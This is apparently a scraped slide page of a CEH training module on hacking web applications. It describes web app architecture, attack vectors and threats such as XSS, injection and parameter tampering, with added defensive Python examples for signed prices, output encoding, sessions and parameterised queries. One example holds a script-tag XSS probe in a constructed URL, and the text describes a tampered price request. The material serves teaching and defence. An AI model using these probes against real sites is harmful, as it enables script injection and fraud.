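    """HMAC over product and price, so a hidden price field can be checked on return."""
    return hmac.new(key, ("%s|%s" % (product, price)).encode(), hashlib.sha256).hexdigest()


def render_hidden_fields(product):
    """Hidden fields for page.aspx: the price plus a signature the client cannot forge."""
    price = catalogue_price(product)
    return ('<input type="hidden" name="price" value="%s">\n'
            '<input type="hidden" name="sig" value="%s">' % (price, sign_price(product, price)))


def accept_order(query_string, key=SERVER_KEY):
    """Validate a submission such as product=Juggyboy%20Shirt&price=200.00&sig=...
    and return the price to charge.  Raises ValueError when the product is unknown,
    the signature does not match, or the signed price is no longer current."""
    params = parse_qs(query_string)
    product = params.get("product", [""])[0]
    price = params.get("price", [""])[0]
    sig = params.get("sig", [""])[0]
    if product not in CATALOGUE:
        raise ValueError("unknown product %r" % product)
    if not hmac.compare_digest(sign_price(product, price, key), sig):
        # price or signature altered on the client side: log this and refuse the order
        raise ValueError("price %s for %r failed signature check" % (price, product))
    if price != catalogue_price(product):
        raise ValueError("signed price is out of date")
    return price


def is_rejected_order(query_string):
    """True when accept_order refuses the submission."""
    try:
        accept_order(query_string)
    except ValueError:
        return True
    return False
```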
FIGURE 13.14: Hidden Field Manipulation Attack (the Normal Request with price=200.00, the Attack Request with price=2.00, and the HTML Code with the hidden field PRICE = 200.00 shown above)
Cross-Site Scripting (XSS) Attacks
Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages,
which enables malicious attackers to inject client-side script into web pages viewed by other users
It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser
for rendering
Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by
hiding it within legitimate requests
- Session hijacking
- Brute force password cracking
- Data theft
- Intranet probing
- Keylogging and remote monitoring
- Malicious script execution
- Redirecting to a malicious server
- Exploiting user privileges
- Ads in hidden IFRAMES and pop-ups
- Data manipulation
Cross-Site Scripting (XSS) Attacks

Cross-site scripting is also called XSS. Vulnerabilities occur when an attacker uses web applications to send malicious JavaScript code to other end users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application uses input from a user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user may trust the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions. An attacker often uses different methods to encode the malicious portion (Unicode) of the tag, so that a request seems genuine to the user. Some of them are:

- Malicious script execution
- Session hijacking
- Brute force password cracking
- Redirecting to a malicious server
- Exploiting user privileges
- Data theft
- Intranet probing
- Ads in hidden IFRAMES and pop-ups
- Data manipulation
- Keylogging and remote monitoring
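The root cause named above, unvalidated input reflected into dynamic content, is best seen with the unsafe render next to its encoded form. The following is an added example and not code from the CEH module: it assumes a page that echoes a `name` query parameter into its HTML (the constructed URL and the textbook script-tag probe are not from the page), shows that HTML entity encoding turns the injected tag into displayed text, and adds the response headers a hardened page would send as defence in depth.

```python
"""Reflected XSS: the unsafe render beside its output-encoded form.

Added example, not code from the CEH module. It assumes a page that echoes a
`name` query parameter into its HTML, the pattern the text describes, and
shows why contextual output encoding stops the injected script from being
parsed as markup. The URL and payload below are constructed.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed probe: the classic script-tag test string, URL-encoded.
CONSTRUCTED_PROBE = "http://shop.example/page.aspx?name=%3Cscript%3Ealert(1)%3C/script%3E"


def _param(url: str, key: str) -> str:
    """Pulls one query parameter out of a URL ("" if absent)."""
    return parse_qs(urlsplit(url).query).get(key, [""])[0]


def render_vulnerable(url: str) -> str:
    """Interpolates the raw parameter, so the browser runs whatever was sent."""
    return f"<p>Hello, {_param(url, 'name')}</p>"


def render_hardened(url: str) -> str:
    """HTML-encodes the parameter: < > & " ' become entities and display as text."""
    return f"<p>Hello, {html.escape(_param(url, 'name'), quote=True)}</p>"


def response_headers() -> dict:
    """Defence in depth for the hardened page: a CSP that forbids inline script
    even if an encoding bug slips through, plus nosniff to stop MIME confusion."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "X-Content-Type-Options": "nosniff",
    }


def reflects_markup(url: str, renderer) -> bool:
    """Detection check: does the untrusted value come back as a live tag?"""
    return "<script" in renderer(url).lower()


if __name__ == "__main__":
    print(render_vulnerable(CONSTRUCTED_PROBE))  # <p>Hello, <script>alert(1)</script></p>
    print(render_hardened(CONSTRUCTED_PROBE))    # <p>Hello, &lt;script&gt;alert(1)&lt;/script&gt;</p>
    print(reflects_markup(CONSTRUCTED_PROBE, render_vulnerable),
          reflects_markup(CONSTRUCTED_PROBE, render_hardened))  # True False
```

`html.escape` is the right encoder only for an HTML text or attribute context; a value placed inside a `<script>` block, a URL, or a CSS rule needs the encoder for that context, which is why templating engines with context-aware autoescaping are preferred over hand-built string formatting.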
Hacking web applications CEHv8 module 13
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 

Recently uploaded (20)

Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 

Hacking web applications CEHv8 module 13

  • 3. Security News: XSS Attacks Lead Pack As Most Frequent Attack Type

Source: http://www.darkreading.com

Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.

Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).

One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.

Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge. The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.

"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage."

The Superfecta attack traffic for Q3 2012 can be broken down as follows: As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has however been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%), to become the second most likely origin of malicious traffic.

Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last: During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customer's financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."

Copyright © 2013 UBM Tech, All rights reserved
http://www.darkreading.com/security/news/240009508/firehost-q3-web-application-report-xss-attacks-lead-pack-as-most-frequent-attack-type.html
  • 6. Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help the network administrator to monitor and manage the web application are described. Finally, web application pen testing is discussed.

This module familiarizes you with:

  • 7. Module Objectives (continued)
    - How Web Applications Work
    - Web Attack Vectors
    - Web Application Threats
    - Web App Hacking Methodology
    - Footprint Web Infrastructure
    - Hacking Web Servers
    - Analyze Web Applications
    - Attack Authentication Mechanism
    - Attack Authorization Schemes
    - Session Management Attack
    - Attack Data Connectivity
    - Attack Web App Client
    - Attack Web Services
    - Web Application Hacking Tools
    - Countermeasures
    - Web Application Security Tools
    - Web Application Firewall
    - Web Application Pen Testing
  • 8. Module Flow

Web applications are application programs that are accessed only over an Internet connection. They use HTTP as their primary communication protocol. Attackers target these apps for several reasons, and the apps are exposed to a variety of attacks. For a clear understanding of hacking web applications, we have divided the topic into the following sections:

    - Web App Concepts
    - Web App Threats
    - Hacking Methodology
    - Web Application Hacking Tools
    - Countermeasures
    - Security Tools
    - Web App Pen Testing

Let us begin with the Web App concepts.
  • 9. Web App Concepts

This section introduces you to the web application and its components, explains how the web application works, and describes its architecture. It provides insight into Web 2.0 applications, vulnerability stacks, and web attack vectors.
  • 10. Web Application Security Statistics

Source: https://www.whitehatsec.com

According to the WhiteHat Security website statistics report in 2012, it is clear that cross-site scripting vulnerabilities are found on more web applications when compared to other vulnerabilities. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities were the most common vulnerabilities, found in 55% of web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.

  • 11. [Figure 13.1: bar chart of vulnerability classes by share of websites affected: Cross-Site Scripting, Information Leakage, Content Spoofing (16%), Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection (10%), Session Fixation, Insufficient Session Expiration.]

FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012
  • 12. Introduction to Web Applications

    - Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
    - Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.
    - New web technologies such as Web 2.0 provide more attack surface for web application exploitation.
    - Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency.

Web applications are applications that run on a remote web server and send their output over the Internet. Web 2.0 technologies are used by all applications based on web servers for functions such as communication with users, clients, third-party users, etc. A web application is comprised of many layers of functionality. However, it is considered a three-layered architecture consisting of presentation, logic, and data layers. The web architecture relies substantially on the technology popularized by the World Wide Web: Hypertext Markup Language (HTML) and the primary transport medium, Hypertext Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client. Typically, it operates over TCP port 80, but it may also communicate over another unused port. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Some of the popular web servers present today are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun ONE. Resources are identified by Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content.

Since HTTP is stateless, i.e., the protocol does not maintain a session state, the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client. Cookies can be used as tokens, which servers hand over to clients to allow access to websites, so that users do not have to request a token for each query. However, cookies are not perfect from a security point of view because they can be copied and stored on the client's local hard disk.

Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers use the different types of vulnerabilities that can be discovered in web applications and exploit them to compromise those applications. Attackers also use tools to launch attacks on web applications.
  • 14. Web Application Components

The components of web applications are listed as follows:

    - Login: Most websites allow authentic users to access the application by means of a login. This means that to access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com.
    - The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server.
    - Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.
    - User Permissions: When the user permissions you are logged in with do not allow you to access the specified web page, you may be redirected again to the login page or to any other page.
    - The Application Content: It is an interactive program that accepts web requests from clients and uses the parameters that are sent by the web browser for carrying out certain functions.
    - Data Access: Usually the web pages contact each other via a data access library in which all the database details are stored.

  • 15. Web Application Components (continued)

    - The Data Store: It provides access to the important data that is shared and synchronized between the child threads. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network; they can be in contact with or accessible to each other through the network connection.
    - Role-level System Security
    - Application Logic: Usually web applications are divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and serves it accordingly. The services offered by the application logic include querying and updating the database as well as generating a user interface.
    - Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either on the initiative of the application logic or automatically when the servlet session times out.
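The login, session tracking, user permission and logout components above, together with the earlier point that HTTP is stateless and relies on cookie tokens, as an added Python illustration (not code from the CEH module): the server keeps a session table keyed by a random token, expires idle tokens, checks the page's required role on every request, and redirects everything else to the login page. The users, roles, page paths and the 15-minute idle timeout are constructed values.

```python
"""Session tracking over stateless HTTP (added illustration, not CEH module code).

HTTP carries no session state, so every request must present a token. The
server-side table below is the only place that token means anything: it is
issued at login, expires after an idle period, is removed at logout, and is
checked against the page's required role on every request.
"""
import hmac
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds a session may stay idle (assumed value)

# Constructed users, roles and page permissions (placeholders, not real data).
# Passwords are plain text here only to keep the example short; a real
# application stores salted password hashes instead.
USERS = {"alice": "correct horse", "bob": "hunter2"}
ROLES = {"alice": {"user", "admin"}, "bob": {"user"}}
PAGE_ROLE = {"/news": "user", "/admin": "admin"}


class SessionStore:
    """Maps opaque session tokens to users; the client never sees the user."""

    def __init__(self, clock=time.time):
        self.clock = clock  # injectable so expiry can be tested without sleeping
        self.sessions = {}  # token -> {"user": str, "last_seen": float}

    def login(self, username, password):
        """Check credentials and issue a fresh random token, or None on failure."""
        stored = USERS.get(username)
        if stored is None or not hmac.compare_digest(stored.encode(), password.encode()):
            return None
        token = secrets.token_urlsafe(32)  # 256 random bits: not guessable
        self.sessions[token] = {"user": username, "last_seen": self.clock()}
        return token

    def lookup(self, token):
        """Resolve a presented token to a username, enforcing the idle timeout."""
        entry = self.sessions.get(token)
        if entry is None:
            return None
        if self.clock() - entry["last_seen"] > IDLE_TIMEOUT:
            del self.sessions[token]  # expired server-side, even if the cookie lives on
            return None
        entry["last_seen"] = self.clock()
        return entry["user"]

    def logout(self, token):
        """End the session so a copied cookie is useless afterwards."""
        self.sessions.pop(token, None)

    def handle(self, path, cookies):
        """Serve one request given only its path and cookie jar.

        Returns (status, body): 302 to /login when there is no valid session,
        403 when the user lacks the page's role, 200 otherwise.
        """
        user = self.lookup(cookies.get("session"))
        if user is None:
            return 302, "/login"
        if PAGE_ROLE.get(path, "user") not in ROLES[user]:
            return 403, "forbidden"
        return 200, f"{path} for {user}"


if __name__ == "__main__":
    store = SessionStore()
    token = store.login("alice", "correct horse")
    print(store.handle("/admin", {"session": token}))  # (200, '/admin for alice')
    store.logout(token)
    print(store.handle("/admin", {"session": token}))  # (302, '/login')
```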
  • 16. How Web Applications Work

[Slide diagram: the browser request reaches the web server and is handed to the web application server, which runs SELECT * from news where id = 6329 against the database; the output row is ID 6329, Topic Tech, News CNN.]

Whenever someone clicks or types in the browser, the requested website or content is immediately displayed on the computer screen, but what is the mechanism behind this? The following is the step-by-step process that takes place once a user sends a request for particular content or a website, where multiple computers are involved. The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynamic content generation technology tools, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information.

Let's see how the user triggers the initial request through the browser to the web application server:

    - First, the user types the website name or URL in the browser and the request is sent to the web server.
    - On receiving the request, the web server checks the file extension:
        - If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
        - If the user requests a web page with the extension CFM, CFML, or CFC, then the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server.
    - The user's request is now processed by the web application server. In order to process the user's request, the web server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored in the database.
    - Once done processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.

FIGURE 13.2: Working of Web Application [diagram: User, Login Form, Internet, Firewall, Web Server]
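The request flow just listed, as an added Python example that is not the module's own code: a stand-in "web server" routes on the file extension, static HTM/HTML pages are returned directly, CFM/CFML/CFC requests go to an "application server" that runs the slide's news lookup (id 6329, Topic Tech, News CNN) against a constructed SQLite table, and the result is returned back up the chain. The file names, URLs, the second news row and the `/news.cfm` handler are constructed for the example.

```python
"""Three-tier request handling (added illustration, not CEH module code).

Tier 1, the web server, dispatches on the file extension; tier 2, the
application server, turns request parameters into a database call; tier 3
is the database holding the news table shown on the slide.
"""
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed static document root (in-memory stand-in for files on disk).
STATIC_FILES = {"/index.html": "<h1>Welcome</h1>", "/about.htm": "<p>About</p>"}
STATIC_EXTENSIONS = (".htm", ".html")          # served by the web server itself
DYNAMIC_EXTENSIONS = (".cfm", ".cfml", ".cfc")  # handed to the application server


def make_database():
    """Third tier: a constructed in-memory news table matching the slide's row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, news TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)",
                   [(6329, "Tech", "CNN"), (6330, "Sports", "ESPN")])
    db.commit()
    return db


def application_server(path, query, db):
    """Second tier: validate the browser's parameters and query the database."""
    if path == "/news.cfm":
        raw = query.get("id", [None])[0]
        if raw is None or not raw.isdigit():
            return 400, "missing or non-numeric id"
        # The slide shows SELECT * from news where id = 6329. Binding the value
        # as a parameter keeps the browser-supplied text out of the SQL itself.
        row = db.execute("SELECT id, topic, news FROM news WHERE id = ?",
                         (int(raw),)).fetchone()
        if row is None:
            return 404, "no such article"
        return 200, {"ID": row[0], "Topic": row[1], "News": row[2]}
    return 404, "no handler for " + path


def web_server(url, db):
    """First tier: inspect the extension and either serve or forward the request.

    Returns (status, body) exactly as it would be relayed to the browser.
    """
    parts = urlsplit(url)
    path, query = parts.path, parse_qs(parts.query)
    ext = path[path.rfind("."):].lower() if "." in path else ""
    if ext in STATIC_EXTENSIONS:
        body = STATIC_FILES.get(path)
        return (200, body) if body is not None else (404, "file not found")
    if ext in DYNAMIC_EXTENSIONS:
        return application_server(path, query, db)
    return 404, "unsupported resource"


if __name__ == "__main__":
    database = make_database()
    print(web_server("http://example.test/index.html", database))
    print(web_server("http://example.test/news.cfm?id=6329", database))
```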
Web Application Architecture

All web applications execute with the help of the web browser as a support client. The web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented by using the client-side script, and the hardware tasks such as storing and gathering the required data are performed by the server-side script. In the following architecture, the clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. The data access is handled by the database layer using cloud services and a database server.

FIGURE 13.3: Web Application Architecture (Clients: web browser, smart phones, web appliance, external web services; Presentation Layer: Flash, Silverlight, JavaScript; Web Server: proxy server/cache, firewall, HTTP request parser, servlet container, resource handler, authentication and login; Business Layer: application server, business logic (J2EE, .NET, COM, XCode, C++, COM+), legacy application, data access; Database Layer: cloud services, database server)
Web 2.0 Applications

Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:

- Advanced gaming
- Dynamic as opposed to static site content
- RSS-generated syndication
- Social networking sites (Flickr, Facebook, del.icio.us)
- Mash-ups (emails, IMs, electronic payment systems)
- Wikis and other collaborative applications
- Google Base and other free web services (Google Maps)
- Ease of data creation, modification, or deletion by individual users
- Online office software (Google Docs and Microsoft Light)
- Interactive encyclopedias and dictionaries
- Cloud computing websites such as Amazon.com
- Frameworks (Yahoo! UI Library, jQuery)
- Flash-rich interface websites
- Mobile applications (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)
Vulnerability Stack

Web applications are maintained and accessed through various levels that include: custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each level help the user in one way or another to access the web application securely. When talking about web applications, security is a critical component to be considered because web applications are a major source of attacks. The following vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that makes the web applications vulnerable:

FIGURE 13.4: Vulnerability Stack
- Custom Web Applications: Business Logic Flaws, Technical Vulnerabilities
- Third Party Components: Open Source / Commercial
- Database: Oracle / MySQL / MS SQL
- Web Server: Apache / Microsoft IIS
- Operating System: Windows / Linux / OS X
- Network: Router / Switch
- Security: IPS / IDS
Web Attack Vectors

An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome. Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting. Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack.

An attack vector is a method of entering unauthorized systems to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors:

- Parameter manipulation: The attacker provides the wrong input value to the web services and gains control over the SQL, LDAP, XPATH, and shell commands. When the incorrect values are provided to the web services, they become vulnerable and are easily attacked through web applications running with web services.
- XML poisoning: Attackers provide manipulated XML documents that, when executed, can disturb the logic of the parsing method on the server. When huge XMLs are executed at the application layer, they can easily be compromised by the attacker to launch his or her attack and gather information.
- Client validation: Most client-side validation has to be supported by server-side authentication. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to perform SQL injection, LDAP injection, etc. and compromise the web application's key resources.
- Server misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.
- Web service routing issues: The SOAP messages are permitted to access different nodes on the Internet by the WS-Routers. The exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints.
- Cross-site scripting: Whenever any infected JavaScript code is executed, the targeted browsers can be exploited by the attacker to gather information.
Module Flow

Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code as related to security is poor, and another issue is an application with a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.

(Module flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing)

This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Web Application Threats - 1

Web application threats are not limited to attacks based on URL and port 80. Despite using ports, protocols, and the OSI layer, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack. The various types of web application threats are as follows:

Cookie Poisoning
By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for a malicious attack, or steal information from the user's system.

Directory Traversal
Attackers exploit HTTP by using directory traversal and are able to access restricted directories; they execute commands outside of the web server's root directory.

Unvalidated Input
In order to bypass the security system, attackers tamper with the HTTP requests, URL, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for the intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.

Cross-site Scripting (XSS)
An attacker bypasses the client's ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.

SQL Injection
This is a type of attack where SQL commands are injected by the attacker via input data; the attacker can then tamper with the data.

Parameter/Form Tampering
This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man-in-the-middle is one example of this type of attack. Attackers use tools like WebScarab and Paros Proxy for these attacks.

Denial-of-Service (DoS)
A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.

Broken Access Control
Broken access control is a method used by attackers where a particular flaw has been identified related to the access control, where authentication is bypassed and the attacker compromises the network.

Cross-site Request Forgery
The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses. For example, a user clicks on a particular link sent through an email or chat.

Information Leakage
Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.

Improper Error Handling
